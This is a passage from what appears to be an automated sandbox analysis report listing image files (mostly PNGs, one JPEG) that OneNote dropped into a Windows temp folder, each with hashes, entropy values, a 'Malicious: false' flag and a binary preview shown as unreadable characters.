Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Temp\{79EB3845-4E90-4A6A-80A4-0DCCD7A33904}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{7A33A1AD-D343-4A4B-9A17-6817EA4EEBBE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Temp\{7A4B4663-48B7-4A05-87C0-7AD1800348FF}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{7BAB034E-25D8-41AA-9D19-A476AA95369E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Temp\{7D04F7D5-5F59-4365-8F43-9BC603C17D26}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{7E328A8F-F2A8-4243-AFE9-E4CBFBBCD3AC}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{7E4EE6A8-3397-45F3-9E5F-7D506C2FCD52}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{7F7A7CBA-1D54-4C83-B72E-6C3D29274750}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{7FCEF373-8325-42E0-86F5-985D655503C9}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{820DDCF1-2B74-4872-963C-45635BF1203F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{823F2D44-B425-4EBA-BA04-3AE4A91B08EF}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Temp\{825EA737-41E9-4236-8CBC-280A42010837}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Temp\{82CA354B-42C4-4E68-AB70-455616333E78}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Temp\{838F0B3A-7B89-49D3-84B4-26B6C957E8BA}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
